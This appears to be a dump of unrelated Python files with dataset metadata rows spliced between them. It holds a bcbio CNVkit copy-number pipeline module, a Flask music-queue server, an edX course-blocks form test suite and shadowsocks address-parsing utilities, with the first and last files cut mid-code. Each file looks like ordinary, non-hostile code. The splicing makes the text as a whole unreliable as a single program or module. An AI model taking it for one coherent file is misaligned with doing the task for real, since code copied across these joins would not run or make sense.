"""Run CNVkit on a tumor/normal pair.
"""
paired = vcfutils.get_paired_bams([x["align_bam"] for x in items], items)
work_dir = _sv_workdir(paired.tumor_data)
ckout = _run_cnvkit_shared(paired.tumor_data, [paired.tumor_bam], [paired.normal_bam],
work_dir, background_name=paired.normal_name)
if not ckout:
return items
tumor_data = _associate_cnvkit_out(ckout, [paired.tumor_data])
normal_data = [x for x in items if dd.get_sample_name(x) != paired.tumor_name]
return tumor_data + normal_data
def _run_cnvkit_population(items, background):
"""Run CNVkit on a population of samples.
Tries to calculate background based on case/controls, otherwise uses
a flat background for each sample and calls independently.
"""
assert not background
inputs, background = shared.find_case_control(items)
return [_run_cnvkit_single(data, background)[0] for data in inputs] + \
[_run_cnvkit_single(data, inputs)[0] for data in background]
def _get_cmd():
return os.path.join(os.path.dirname(sys.executable), "cnvkit.py")
def _run_cnvkit_shared(data, test_bams, background_bams, work_dir, background_name=None):
"""Shared functionality to run CNVkit.
"""
ref_file = dd.get_ref_file(data)
raw_work_dir = os.path.join(work_dir, "raw")
out_base = os.path.splitext(os.path.basename(test_bams[0]))[0].split(".")[0]
background_cnn = "%s_background.cnn" % (background_name if background_name else "flat")
files = {"cnr": os.path.join(raw_work_dir, "%s.cnr" % out_base),
"cns": os.path.join(raw_work_dir, "%s.cns" % out_base),
"back_cnn": os.path.join(raw_work_dir, background_cnn)}
if not utils.file_exists(files["cnr"]):
if os.path.exists(raw_work_dir):
shutil.rmtree(raw_work_dir)
with tx_tmpdir(data, work_dir) as tx_work_dir:
cov_interval = dd.get_coverage_interval(data)
raw_target_bed, access_bed = _get_target_access_files(cov_interval, data, work_dir)
# bail out if we ended up with no regions
if not utils.file_exists(raw_target_bed):
return {}
target_bed = annotate.add_genes(raw_target_bed, data)
# Do not paralleize cnvkit due to current issues with multi-processing
cores = 1
# cores = min(tz.get_in(["config", "algorithm", "num_cores"], data, 1),
# len(test_bams) + len(background_bams))
cmd = [_get_cmd(), "batch"] + \
test_bams + ["-n"] + background_bams + ["-f", ref_file] + \
["--targets", target_bed, "--access", access_bed] + \
["-d", tx_work_dir, "--split", "-p", str(cores),
"--output-reference", os.path.join(tx_work_dir, background_cnn)]
if cov_interval not in ["amplicon", "genome"]:
at_avg, at_min, t_avg = _get_antitarget_size(access_bed, target_bed)
if at_avg:
cmd += ["--antitarget-avg-size", str(at_avg), "--antitarget-min-size", str(at_min),
"--target-avg-size", str(t_avg)]
local_sitelib = os.path.join(install.get_defaults().get("tooldir", "/usr/local"),
"lib", "R", "site-library")
cmd += ["--rlibpath", local_sitelib]
do.run(cmd, "CNVkit batch")
shutil.move(tx_work_dir, raw_work_dir)
for ftype in ["cnr", "cns"]:
if not os.path.exists(files[ftype]):
raise IOError("Missing CNVkit %s file: %s" % (ftype, files[ftype]))
return files
def _get_target_access_files(cov_interval, data, work_dir):
"""Retrieve target and access files based on the type of data to process.
pick targets, anti-targets and access files based on analysis type
http://cnvkit.readthedocs.org/en/latest/nonhybrid.html
"""
base_regions = regions.get_sv_bed(data)
# if we don't have a configured BED or regions to use for SV caling
if not base_regions:
# For genome calls, subset to regions within 10kb of genes
if cov_interval == "genome":
base_regions = regions.get_sv_bed(data, "transcripts1e4", work_dir)
# Finally, default to the defined variant regions
if not base_regions:
base_regions = dd.get_variant_regions(data)
target_bed = bedutils.merge_overlaps(base_regions, data, out_dir=work_dir)
if cov_interval == "amplicon":
return target_bed, target_bed
elif cov_interval == "genome":
return target_bed, target_bed
else:
access_file = _create_access_file(dd.get_ref_file(data), _sv_workdir(data), data)
return target_bed, access_file
def _add_seg_to_output(out, data):
"""Export outputs to 'seg' format compatible with IGV and GenePattern.
"""
out_file = "%s.seg" % os.path.splitext(out["cns"])[0]
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "cnvkit.py"), "export",
"seg", "-o", tx_out_file, out["cns"]]
do.run(cmd, "CNVkit export seg")
out["seg"] = out_file
return out
def _add_cnr_bedgraph_and_bed_to_output(out, data):
cnr_file = out["cnr"]
bedgraph_file = cnr_file + ".bedgraph"
if not utils.file_exists(bedgraph_file):
with file_transaction(data, bedgraph_file) as tx_out_file:
cmd = "sed 1d {cnr_file} | cut -f1,2,3,5 > {tx_out_file}"
do.run(cmd.format(**locals()), "Converting cnr to bedgraph format")
out["cnr_bedgraph"] = bedgraph_file
bed_file = cnr_file + ".bed"
if not utils.file_exists(bed_file):
with file_transaction(data, bed_file) as tx_out_file:
cmd = "sed 1d {cnr_file} | cut -f1,2,3,4,5 > {tx_out_file}"
do.run(cmd.format(**locals()), "Converting cnr to bed format")
out["cnr_bed"] = bed_file
return out
def _add_bed_to_output(out, data):
"""Call ploidy and convert into BED representation.
"""
call_file = "%s-call%s" % os.path.splitext(out["cns"])
gender = dd.get_gender(data)
if not utils.file_exists(call_file):
with file_transaction(data, call_file) as tx_call_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "cnvkit.py"), "call",
"--ploidy", str(dd.get_ploidy(data)),
"-o", tx_call_file, out["cns"]]
if gender:
cmd += ["--gender", gender]
if gender.lower() == "male":
cmd += ["--male-reference"]
do.run(cmd, "CNVkit call ploidy")
out_file = "%s.bed" % os.path.splitext(call_file)[0]
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "cnvkit.py"), "export",
"bed", "--sample-id", dd.get_sample_name(data),
"--ploidy", str(dd.get_ploidy(data)),
"-o", tx_out_file, call_file]
if gender and gender.lower() == "male":
cmd += ["--male-reference"]
do.run(cmd, "CNVkit export BED")
out["call_file"] = call_file
out["vrn_file"] = annotate.add_genes(out_file, data)
return out
def _add_segmetrics_to_output(out, data):
"""Add metrics for measuring reliability of CNV estimates.
"""
out_file = "%s-segmetrics.txt" % os.path.splitext(out["cns"])[0]
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "cnvkit.py"), "segmetrics",
"--iqr", "--ci", "--pi",
"-s", out["cns"], "-o", tx_out_file, out["cnr"]]
do.run(cmd, "CNVkit segmetrics")
out["segmetrics"] = out_file
return out
def _add_gainloss_to_output(out, data):
"""Add gainloss based on genes, helpful for identifying changes in smaller genes.
"""
out_file = "%s-gainloss.txt" % os.path.splitext(out["cns"])[0]
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "cnvkit.py"), "gainloss",
"-s", out["cns"], "-o", tx_out_file, out["cnr"]]
do.run(cmd, "CNVkit gainloss")
out["gainloss"] = out_file
return out
def _add_coverage_bedgraph_to_output(out, data):
"""Add BedGraph representation of coverage to the output
"""
out_file = "%s.coverage.bedgraph" % os.path.splitext(out["cns"])[0]
if utils.file_exists(out_file):
out["bedgraph"] = out_file
return out
bam_file = dd.get_align_bam(data)
bedtools = config_utils.get_program("bedtools", data["config"])
samtools = config_utils.get_program("samtools", data["config"])
cns_file = out["cns"]
bed_file = tempfile.NamedTemporaryFile(suffix=".bed", delete=False).name
with file_transaction(data, out_file) as tx_out_file:
cmd = ("sed 1d {cns_file} | cut -f1,2,3 > {bed_file}; "
"{samtools} view -b -L {bed_file} {bam_file} | "
"{bedtools} genomecov -bg -ibam - -g {bed_file} >"
"{tx_out_file}").format(**locals())
do.run(cmd, "CNVkit bedGraph conversion")
os.remove(bed_file)
out["bedgraph"] = out_file
return out
def _add_plots_to_output(out, data):
"""Add CNVkit plots summarizing called copy number values.
"""
out["plot"] = {}
diagram_plot = _add_diagram_plot(out, data)
if diagram_plot:
out["plot"]["diagram"] = diagram_plot
loh_plot = _add_loh_plot(out, data)
if loh_plot:
out["plot"]["loh"] = loh_plot
scatter_plot = _add_scatter_plot(out, data)
if scatter_plot:
out["plot"]["scatter"] = scatter_plot
return out
def _get_larger_chroms(ref_file):
"""Retrieve larger chromosomes, avoiding the smaller ones for plotting.
"""
from scipy.cluster.vq import kmeans, vq
all_sizes = []
for c in ref.file_contigs(ref_file):
all_sizes.append(float(c.size))
all_sizes.sort()
# separate out smaller chromosomes and haplotypes with kmeans
centroids, _ = kmeans(np.array(all_sizes), 2)
idx, _ = vq(np.array(all_sizes), centroids)
little_sizes = tz.first(tz.partitionby(lambda xs: xs[0], zip(idx, all_sizes)))
little_sizes = [x[1] for x in little_sizes]
# create one more cluster with the smaller, removing the haplotypes
centroids2, _ = kmeans(np.array(little_sizes), 2)
idx2, _ = vq(np.array(little_sizes), centroids2)
little_sizes2 = tz.first(tz.partitionby(lambda xs: xs[0], zip(idx2, little_sizes)))
little_sizes2 = [x[1] for x in little_sizes2]
# get any chromosomes not in haplotype/random bin
thresh = max(little_sizes2)
larger_chroms = []
for c in ref.file_contigs(ref_file):
if c.size > thresh:
larger_chroms.append(c.name)
return larger_chroms
def _remove_haplotype_chroms(in_file, data):
"""Remove shorter haplotype chromosomes from cns/cnr files for plotting.
"""
larger_chroms = set(_get_larger_chroms(dd.get_ref_file(data)))
out_file = "%s-chromfilter%s" % utils.splitext_plus(in_file)
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
with open(in_file) as in_handle:
with open(tx_out_file, "w") as out_handle:
for line in in_handle:
if line.startswith("chromosome") or line.split()[0] in larger_chroms:
out_handle.write(line)
return out_file
def _add_scatter_plot(out, data):
out_file = "%s-scatter.pdf" % os.path.splitext(out["cnr"])[0]
priority_regions = dd.get_priority_regions(data)
if not priority_regions:
return None
priority_bed = plot._prioritize_plot_regions(pybedtools.BedTool(priority_regions), data)
if utils.file_exists(out_file):
return out_file
cnr = _remove_haplotype_chroms(out["cnr"], data)
cns = _remove_haplotype_chroms(out["cns"], data)
with file_transaction(data, out_file) as tx_out_file:
cmd = [_get_cmd(), "scatter", "-s", cns, "-o", tx_out_file, "-l",
priority_bed, cnr]
do.run(cmd, "CNVkit scatter plot")
return out_file
def _cnx_is_empty(in_file):
"""Check if cnr or cns files are empty (only have a header)
"""
with open(in_file) as in_handle:
for i, line in enumerate(in_handle):
if i > 0:
return False
return True
def _add_diagram_plot(out, data):
out_file = "%s-diagram.pdf" % os.path.splitext(out["cnr"])[0]
cnr = _remove_haplotype_chroms(out["cnr"], data)
cns = _remove_haplotype_chroms(out["cns"], data)
if _cnx_is_empty(cnr) or _cnx_is_empty(cns):
return None
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [_get_cmd(), "diagram", "-s", cns,
"-o", tx_out_file, cnr]
gender = dd.get_gender(data)
if gender and gender.lower() == "male":
cmd += ["--male-reference"]
do.run(cmd, "CNVkit diagram plot")
return out_file
def _add_loh_plot(out, data):
vrn_files = filter(lambda x: x is not None, [x.get("vrn_file") for x in data.get("variants", [])])
if len(vrn_files) > 0:
out_file = "%s-loh.pdf" % os.path.splitext(out["cnr"])[0]
cns = _remove_haplotype_chroms(out["cns"], data)
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [_get_cmd(), "loh", "-t", "-s", cns,
"-o", tx_out_file, vrn_files[0]]
do.run(cmd, "CNVkit diagram plot")
return out_file
def _get_antitarget_size(access_file, target_bed):
"""Retrieve anti-target size based on distance between target regions.
Handles smaller anti-target regions like found in subset genomes and tests.
https://groups.google.com/d/msg/biovalidation/0OdeMfQM1CA/S_mobiz3eJUJ
"""
prev = (None, 0)
sizes = []
for region in pybedtools.BedTool(access_file).subtract(target_bed):
prev_chrom, prev_end = prev
if region.chrom == prev_chrom:
sizes.append(region.start - prev_end)
prev = (region.chrom, region.end)
avg_size = np.median(sizes) if len(sizes) > 0 else 0
if len(sizes) < 500 and avg_size < 10000.0: # Default antitarget-min-size
return 1000, 75, 1000
else:
return None, None, None
def _create_access_file(ref_file, out_dir, data):
"""Create genome access file for CNVlib to define available genomic regions.
XXX Can move to installation/upgrade process if too slow here.
"""
out_file = os.path.join(out_dir, "%s-access.bed" % os.path.splitext(os.path.basename(ref_file))[0])
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "genome2access.py"),
ref_file, "-s", "10000", "-o", tx_out_file]
do.run(cmd, "Create CNVkit access file")
return out_file
# ## Theta support
def export_theta(ckout, data):
"""Provide updated set of data with export information for TheTA2 input.
"""
cns_file = chromhacks.bed_to_standardonly(ckout["cns"], data, headers="chromosome")
cnr_file = chromhacks.bed_to_standardonly(ckout["cnr"], data, headers="chromosome")
out_file = "%s-theta.input" % utils.splitext_plus(cns_file)[0]
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [_get_cmd(), "export", "theta", cns_file, cnr_file, "-o", tx_out_file]
do.run(cmd, "Export CNVkit calls as inputs for TheTA2")
# ckout["theta_input"] = _subset_theta_to_calls(out_file, ckout, data)
ckout["theta_input"] = out_file
return ckout
def _subset_theta_to_calls(in_file, ckout, data):
"""Subset CNVkit regions to provide additional signal for THetA.
THetA has default assumptions about lengths of calls and finding
useful signal in longer regions. We adjust for this by subsetting
calls to a range around the most useful signal.
"""
tn_ratio = 0.9
keep_background = False
out_file = "%s-cnvsize%s" % utils.splitext_plus(in_file)
if not utils.file_uptodate(out_file, in_file):
call_sizes = []
calls = set([])
with open(ckout["vrn_file"]) as in_handle:
for line in in_handle:
chrom, start, end, _, count = line.split()[:5]
if max([int(x) for x in count.split(",")]) < 6:
call_sizes.append((int(end) - int(start)))
calls.add((chrom, start, end))
keep_min = np.percentile(call_sizes, 10)
keep_max = np.percentile(call_sizes, 90)
with file_transaction(data, out_file) as tx_out_file:
with open(tx_out_file, "w") as out_handle:
# Pull out calls that have tumor/normal differences
tn_count = 0
with open(in_file) as in_handle:
for line in in_handle:
if line.startswith("#"):
out_handle.write(line)
else:
key = tuple(line.split()[1:4])
sizes = [float(x) for x in line.split()[4:6]]
size = int(key[2]) - int(key[1])
if size >= keep_min and size <= keep_max:
if (min(sizes) / max(sizes)) < tn_ratio:
tn_count += 1
out_handle.write(line)
if keep_background:
# Pull out equal number of background calls
no_tn_count = 0
with open(in_file) as in_handle:
for line in in_handle:
if not line.startswith("#"):
key = tuple(line.split()[1:4])
sizes = [float(x) for x in line.split()[4:6]]
size = int(key[2]) - int(key[1])
if size >= keep_min and size <= keep_max:
if no_tn_count < tn_count and (min(sizes) / max(sizes)) > tn_ratio:
no_tn_count += 1
out_handle.write(line)
return out_file
| mit | 399,970,227,852,909,060 | 43.103448 | 103 | 0.589109 | false |
tietokilta-saato/tikplay | tikplay/server.py | 1 | 5529 | import json
import os
from hashlib import sha1
from flask import request, jsonify, current_app
from flask.ext.restful import Resource
import time
from werkzeug.utils import secure_filename
import traceback
from audio import play_file
from provider.provider import Provider
from provider.task import TaskState
from utils import is_uri, is_url
__version__ = 'v1.0'
url_base = '/srv/{}'.format(__version__)
ALLOWED_EXTENSIONS = {'mp3', 'ogg', 'wav'}
class File(Resource):
def __allowed_file(self, file):
return file.filename.split('.')[-1].lower() in ALLOWED_EXTENSIONS
def post(self):
"""
POST a new song to save
"""
file = request.files['file']
filename = secure_filename(file.filename)
if file and self.__allowed_file(file):
calced_hash = sha1(file.stream.read()).hexdigest()
file.stream.seek(0)
_filename = "{}.{}".format(calced_hash, file.filename.split('.')[-1])
if not _filename.endswith(".mp3"):
_filename += ".mp3"
file.save(os.path.join(current_app.config['UPLOAD_FOLDER'], _filename))
current_app.config['audio_api'].update()
time.sleep(2.0) # Whoo, ugly hacks
return jsonify(filename=filename, saved=True, key="sha1:" + calced_hash,
text="File successfully saved as {}. Use this as key to play this file".format(calced_hash))
elif not self.__allowed_file(file):
return jsonify(filename=filename, saved=False,
text="Filetype not allowed! (allowed: {})".format(", ".join(ALLOWED_EXTENSIONS)))
else:
return jsonify(filename="", saved=False,
text="You have to send a file, e.g. curl -X POST -F file=\"@<file>\" <server_address>")
class Queue(Resource):
def get(self, length=10):
"""
GET the now_playing queue
"""
audio_api = current_app.config['audio_api']
return jsonify(text=audio_api.now_playing(queue_length=length))
def delete(self):
audio_api = current_app.config['audio_api']
return jsonify(text=audio_api.kill())
class Song(Resource):
def __init__(self):
super()
self.prov = Provider(conf={'download_dir': current_app.config['song_dir']})
self.cache = current_app.config['cache_handler']
def get(self):
"""
GET now playing song
"""
audio_api = current_app.config['audio_api']
return jsonify(text=audio_api.now_playing(queue_length=1))
def delete(self):
"""
DELETE now playing song (i.e. skip a song)
"""
audio_api = current_app.config['audio_api']
return jsonify(text=audio_api.next_())
def post(self):
"""
POST a new song to play by URI/URL.
"""
try:
data = json.loads(request.data.decode())
except ValueError:
return jsonify(error=True, text="Invalid JSON given")
uri = data["url"]
if not uri:
return jsonify(error=True, text="Invalid URI")
if is_url(uri):
uri = self.prov.canonicalize(uri)
elif not is_uri(uri):
return jsonify(error=True, text="Invalid URI")
audio_api = current_app.config['audio_api']
fn = self.cache.get_song(uri)
if fn is not None:
return play_file(
audio_api, current_app.config['songlogger'], fn, data.get("filename", uri), user=data["user"]
)
try:
task = self.prov.get(uri)
except ValueError:
return jsonify(error=True, text="No provider found for " + uri)
if task.state == TaskState.exception:
return jsonify(error=True, text=traceback.format_exception_only(type(task.exception), task.exception))
task.metadata['user'] = data.get('user', 'anonymous')
task.metadata['original_filename'] = data.get('filename', uri)
with current_app.config['task_lock']:
current_app.config['task_dict'][task.id] = task
return jsonify(error=False, task=task.id, text="Task received, fetching song")
class Task(Resource):
def get(self, id_):
"""
GET information about a task.
:param id_: Task ID
:return:
"""
task = current_app.config['task_dict'].get(int(id_), None)
if task is None:
return jsonify(error=True, text="Task not found")
return jsonify(id=task.id, state=task.state, url=task.url)
class Find(Resource):
def get(self, find_type, find_key):
"""
GET find a song from the database.
Keyword arguments:
find_type: valid values 1 (song_hash), 2 (artist), 3 (title), 4 (length), 5 (filename)
find_key: value corresponding to the type: 1 (SHA1), 2 (String),
3 (String), 4 (Integer (seconds)), 5 (filename)
"""
methods = ['song_hash', 'artist', 'title', 'length', 'filename']
cache_handler = current_app.config['cache_handler']
# find_type is ints from 1 - 5, list indices are ints from 0 - 4
found = cache_handler.find(methods[find_type - 1], find_key)
if found is not None:
return jsonify(find_type=methods[find_type - 1], find_key=find_key, found=True, text=str(found))
else:
return jsonify(find_type=methods[find_type - 1], find_key=find_key, found=False)
| mit | 5,394,548,310,711,186,000 | 33.773585 | 119 | 0.584012 | false |
jolyonb/edx-platform | lms/djangoapps/course_api/blocks/tests/test_forms.py | 1 | 8460 | """
Tests for Course Blocks forms
"""
from urllib import urlencode
import ddt
from django.http import Http404, QueryDict
from opaque_keys.edx.locator import CourseLocator
from rest_framework.exceptions import PermissionDenied
from openedx.core.djangoapps.util.test_forms import FormTestMixin
from student.models import CourseEnrollment
from student.tests.factories import CourseEnrollmentFactory, UserFactory
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from ..forms import BlockListGetForm
@ddt.ddt
class TestBlockListGetForm(FormTestMixin, SharedModuleStoreTestCase):
"""
Tests for BlockListGetForm
"""
FORM_CLASS = BlockListGetForm
@classmethod
def setUpClass(cls):
super(TestBlockListGetForm, cls).setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super(TestBlockListGetForm, self).setUp()
self.student = UserFactory.create()
self.student2 = UserFactory.create()
self.staff = UserFactory.create(is_staff=True)
CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)
CourseEnrollmentFactory.create(user=self.student2, course_id=self.course.id)
usage_key = self.course.location
self.initial = {'requesting_user': self.student}
self.form_data = QueryDict(
urlencode({
'username': self.student.username,
'usage_key': unicode(usage_key),
}),
mutable=True,
)
self.cleaned_data = {
'all_blocks': None,
'block_counts': set(),
'depth': 0,
'nav_depth': None,
'return_type': 'dict',
'requested_fields': {'display_name', 'type'},
'student_view_data': set(),
'usage_key': usage_key,
'username': self.student.username,
'user': self.student,
'block_types_filter': set(),
}
def assert_raises_permission_denied(self):
"""
Fail unless permission is denied to the form
"""
with self.assertRaises(PermissionDenied):
self.get_form(expected_valid=False)
def assert_raises_not_found(self):
"""
Fail unless a 404 occurs
"""
with self.assertRaises(Http404):
self.get_form(expected_valid=False)
def assert_equals_cleaned_data(self):
"""
Check that the form returns the expected data
"""
form = self.get_form(expected_valid=True)
self.assertDictEqual(form.cleaned_data, self.cleaned_data)
def test_basic(self):
self.assert_equals_cleaned_data()
#-- usage key
def test_no_usage_key_param(self):
self.form_data.pop('usage_key')
self.assert_error('usage_key', "This field is required.")
def test_invalid_usage_key(self):
self.form_data['usage_key'] = 'invalid_usage_key'
self.assert_error('usage_key', "'invalid_usage_key' is not a valid usage key.")
def test_non_existent_usage_key(self):
self.form_data['usage_key'] = self.store.make_course_usage_key(CourseLocator('non', 'existent', 'course'))
self.assert_raises_permission_denied()
#-- user
@ddt.data("True", "true", True)
def test_no_user_all_blocks_true(self, all_blocks_value):
self.initial = {'requesting_user': self.staff}
self.form_data.pop('username')
self.form_data['all_blocks'] = all_blocks_value
self.get_form(expected_valid=True)
@ddt.data("False", "false", False)
def test_no_user_all_blocks_false(self, all_blocks_value):
self.initial = {'requesting_user': self.staff}
self.form_data.pop('username')
self.form_data['all_blocks'] = all_blocks_value
self.assert_error('username', "This field is required unless all_blocks is requested.")
def test_no_user_all_blocks_none(self):
self.initial = {'requesting_user': self.staff}
self.form_data.pop('username')
self.assert_error('username', "This field is required unless all_blocks is requested.")
def test_no_user_non_staff(self):
self.form_data.pop('username')
self.form_data['all_blocks'] = True
self.assert_raises_permission_denied()
def test_nonexistent_user_by_student(self):
self.form_data['username'] = 'non_existent_user'
self.assert_raises_permission_denied()
def test_nonexistent_user_by_staff(self):
self.initial = {'requesting_user': self.staff}
self.form_data['username'] = 'non_existent_user'
self.assert_raises_not_found()
def test_other_user_by_student(self):
self.form_data['username'] = self.student2.username
self.assert_raises_permission_denied()
def test_other_user_by_staff(self):
self.initial = {'requesting_user': self.staff}
self.get_form(expected_valid=True)
def test_unenrolled_student(self):
CourseEnrollment.unenroll(self.student, self.course.id)
self.assert_raises_permission_denied()
def test_unenrolled_staff(self):
CourseEnrollment.unenroll(self.staff, self.course.id)
self.initial = {'requesting_user': self.staff}
self.form_data['username'] = self.staff.username
self.get_form(expected_valid=True)
def test_unenrolled_student_by_staff(self):
CourseEnrollment.unenroll(self.student, self.course.id)
self.initial = {'requesting_user': self.staff}
self.get_form(expected_valid=True)
#-- depth
def test_depth_integer(self):
self.form_data['depth'] = 3
self.cleaned_data['depth'] = 3
self.assert_equals_cleaned_data()
def test_depth_all(self):
self.form_data['depth'] = 'all'
self.cleaned_data['depth'] = None
self.assert_equals_cleaned_data()
def test_depth_invalid(self):
self.form_data['depth'] = 'not_an_integer'
self.assert_error('depth', "'not_an_integer' is not a valid depth value.")
#-- nav depth
def test_nav_depth(self):
self.form_data['nav_depth'] = 3
self.cleaned_data['nav_depth'] = 3
self.cleaned_data['requested_fields'] |= {'nav_depth'}
self.assert_equals_cleaned_data()
def test_nav_depth_invalid(self):
self.form_data['nav_depth'] = 'not_an_integer'
self.assert_error('nav_depth', "Enter a whole number.")
def test_nav_depth_negative(self):
self.form_data['nav_depth'] = -1
self.assert_error('nav_depth', "Ensure this value is greater than or equal to 0.")
#-- return_type
def test_return_type(self):
self.form_data['return_type'] = 'list'
self.cleaned_data['return_type'] = 'list'
self.assert_equals_cleaned_data()
def test_return_type_invalid(self):
self.form_data['return_type'] = 'invalid_return_type'
self.assert_error(
'return_type',
"Select a valid choice. invalid_return_type is not one of the available choices."
)
#-- requested fields
def test_requested_fields(self):
self.form_data.setlist('requested_fields', ['graded', 'nav_depth', 'some_other_field'])
self.cleaned_data['requested_fields'] |= {'graded', 'nav_depth', 'some_other_field'}
self.assert_equals_cleaned_data()
@ddt.data('block_counts', 'student_view_data')
def test_higher_order_field(self, field_name):
field_value = {'block_type1', 'block_type2'}
self.form_data.setlist(field_name, field_value)
self.cleaned_data[field_name] = field_value
self.cleaned_data['requested_fields'].add(field_name)
self.assert_equals_cleaned_data()
def test_combined_fields(self):
# add requested fields
self.form_data.setlist('requested_fields', ['field1', 'field2'])
# add higher order fields
block_types_list = {'block_type1', 'block_type2'}
for field_name in ['block_counts', 'student_view_data']:
self.form_data.setlist(field_name, block_types_list)
self.cleaned_data[field_name] = block_types_list
# verify the requested_fields in cleaned_data includes all fields
self.cleaned_data['requested_fields'] |= {'field1', 'field2', 'student_view_data', 'block_counts'}
self.assert_equals_cleaned_data()
| agpl-3.0 | 6,443,629,654,869,371,000 | 34.39749 | 114 | 0.635697 | false |
serika00/shadowsocks | shadowsocks/common.py | 1 | 9079 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import socket
import struct
import logging
def compat_ord(s):
if type(s) == int:
return s
return _ord(s)
def compat_chr(d):
if bytes == str:
return _chr(d)
return bytes([d])
_ord = ord
_chr = chr
ord = compat_ord
chr = compat_chr
def to_bytes(s):
if bytes != str:
if type(s) == str:
return s.encode('utf-8')
return s
def to_str(s):
if bytes != str:
if type(s) == bytes:
return s.decode('utf-8')
return s
def inet_ntop(family, ipstr):
if family == socket.AF_INET:
return to_bytes(socket.inet_ntoa(ipstr))
elif family == socket.AF_INET6:
import re
v6addr = ':'.join(('%02X%02X' % (ord(i), ord(j))).lstrip('0')
for i, j in zip(ipstr[::2], ipstr[1::2]))
v6addr = re.sub('::+', '::', v6addr, count=1)
return to_bytes(v6addr)
def inet_pton(family, addr):
addr = to_str(addr)
if family == socket.AF_INET:
return socket.inet_aton(addr)
elif family == socket.AF_INET6:
if '.' in addr: # a v4 addr
v4addr = addr[addr.rindex(':') + 1:]
v4addr = socket.inet_aton(v4addr)
v4addr = map(lambda x: ('%02X' % ord(x)), v4addr)
v4addr.insert(2, ':')
newaddr = addr[:addr.rindex(':') + 1] + ''.join(v4addr)
return inet_pton(family, newaddr)
dbyts = [0] * 8 # 8 groups
grps = addr.split(':')
for i, v in enumerate(grps):
if v:
dbyts[i] = int(v, 16)
else:
for j, w in enumerate(grps[::-1]):
if w:
dbyts[7 - j] = int(w, 16)
else:
break
break
return b''.join((chr(i // 256) + chr(i % 256)) for i in dbyts)
else:
raise RuntimeError("What family?")
def is_ip(address):
for family in (socket.AF_INET, socket.AF_INET6):
try:
if type(address) != str:
address = address.decode('utf8')
inet_pton(family, address)
return family
except (TypeError, ValueError, OSError, IOError):
pass
return False
def patch_socket():
if not hasattr(socket, 'inet_pton'):
socket.inet_pton = inet_pton
if not hasattr(socket, 'inet_ntop'):
socket.inet_ntop = inet_ntop
patch_socket()
ADDRTYPE_IPV4 = 1
ADDRTYPE_IPV6 = 4
ADDRTYPE_HOST = 3
def pack_addr(address):
address_str = to_str(address)
for family in (socket.AF_INET, socket.AF_INET6):
try:
r = socket.inet_pton(family, address_str)
if family == socket.AF_INET6:
return b'\x04' + r
else:
return b'\x01' + r
except (TypeError, ValueError, OSError, IOError):
pass
if len(address) > 255:
address = address[:255] # TODO
return b'\x03' + chr(len(address)) + address
def parse_header(data, block_pattern):
addrtype = ord(data[0])
dest_addr = None
dest_port = None
header_length = 0
if addrtype == ADDRTYPE_IPV4:
if len(data) >= 7:
dest_addr = socket.inet_ntoa(data[1:5])
dest_port = struct.unpack('>H', data[5:7])[0]
header_length = 7
else:
logging.warn('header is too short')
elif addrtype == ADDRTYPE_HOST:
if len(data) > 2:
addrlen = ord(data[1])
if len(data) >= 2 + addrlen:
dest_addr = data[2:2 + addrlen]
dest_port = struct.unpack('>H', data[2 + addrlen:4 +
addrlen])[0]
header_length = 4 + addrlen
else:
logging.warn('header is too short')
else:
logging.warn('header is too short')
elif addrtype == ADDRTYPE_IPV6:
if len(data) >= 19:
dest_addr = socket.inet_ntop(socket.AF_INET6, data[1:17])
dest_port = struct.unpack('>H', data[17:19])[0]
header_length = 19
else:
logging.warn('header is too short')
else:
logging.warn('unsupported addrtype %d, maybe wrong password or '
'encryption method' % addrtype)
if dest_addr is None:
return None
dest_addr = to_bytes(dest_addr)
if block_pattern.match(dest_addr) != None:
print('deny ' + dest_addr)
dest_addr = '127.0.0.1'
return addrtype, dest_addr, dest_port, header_length
class IPNetwork(object):
ADDRLENGTH = {socket.AF_INET: 32, socket.AF_INET6: 128, False: 0}
def __init__(self, addrs):
self._network_list_v4 = []
self._network_list_v6 = []
if type(addrs) == str:
addrs = addrs.split(',')
list(map(self.add_network, addrs))
def add_network(self, addr):
if addr is "":
return
block = addr.split('/')
addr_family = is_ip(block[0])
addr_len = IPNetwork.ADDRLENGTH[addr_family]
if addr_family is socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(block[0]))
elif addr_family is socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, block[0]))
ip = (hi << 64) | lo
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
if len(block) is 1:
prefix_size = 0
while (ip & 1) == 0 and ip is not 0:
ip >>= 1
prefix_size += 1
logging.warn("You did't specify CIDR routing prefix size for %s, "
"implicit treated as %s/%d" % (addr, addr, addr_len))
elif block[1].isdigit() and int(block[1]) <= addr_len:
prefix_size = addr_len - int(block[1])
ip >>= prefix_size
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
if addr_family is socket.AF_INET:
